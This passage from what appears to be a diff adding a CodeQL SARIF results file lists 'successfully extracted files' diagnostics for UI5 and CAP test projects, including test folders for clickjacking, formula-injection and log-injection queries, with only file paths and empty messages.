"javascript/frameworks/ui5/lib/qlpack.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 117 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/src/codeql-pack.lock.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 118 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/src/qlpack.yml", + "uriBaseId" : 
"%SRCROOT%", + "index" : 119 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/codeql-pack.lock.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 120 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/lib/BindingStringParser/test.js", + "uriBaseId" : "%SRCROOT%", + "index" : 121 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 122 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/lib/Bindings/test.js", + "uriBaseId" : "%SRCROOT%", + "index" : 123 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + 
"descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/lib/Bindings/test.html", + "uriBaseId" : "%SRCROOT%", + "index" : 124 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/lib/Bindings/test.json", + "uriBaseId" : "%SRCROOT%", + "index" : 125 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/lib/Bindings/test.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 126 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/lib/JsonParser/test.js", + "uriBaseId" : "%SRCROOT%", + "index" : 127 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + 
"formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/models/attachDisplay_detachDisplay/webapp/view/App.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 128 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/models/binding_path/binding1.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 129 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/models/binding_path/bindingComposite.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 130 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/models/property_getter_setter/webapp/view/App.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 131 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + 
"locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/models/sink/sink1.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 132 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/models/source/source1.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 133 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/models/multiple_models/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 134 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/qlpack.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 135 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-allow-all/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 136 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-allow-all/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 137 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-default-all/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 138 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-default-all/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 139 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-deny-all/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 140 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-deny-all/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 141 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 142 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 143 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + 
"artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 144 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 145 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 146 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 147 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + 
"properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 148 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 149 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 150 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 151 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : 
"js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 152 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 153 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 154 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 155 + } + } + } ], + 
"message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 156 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 157 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 158 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 159 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 160 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 161 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 162 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + 
"artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 163 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 164 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 165 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 166 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + 
}, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 167 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 168 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 169 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + 
"formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 170 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 171 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 172 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 173 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", 
+ "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 174 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 175 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 176 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 177 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + 
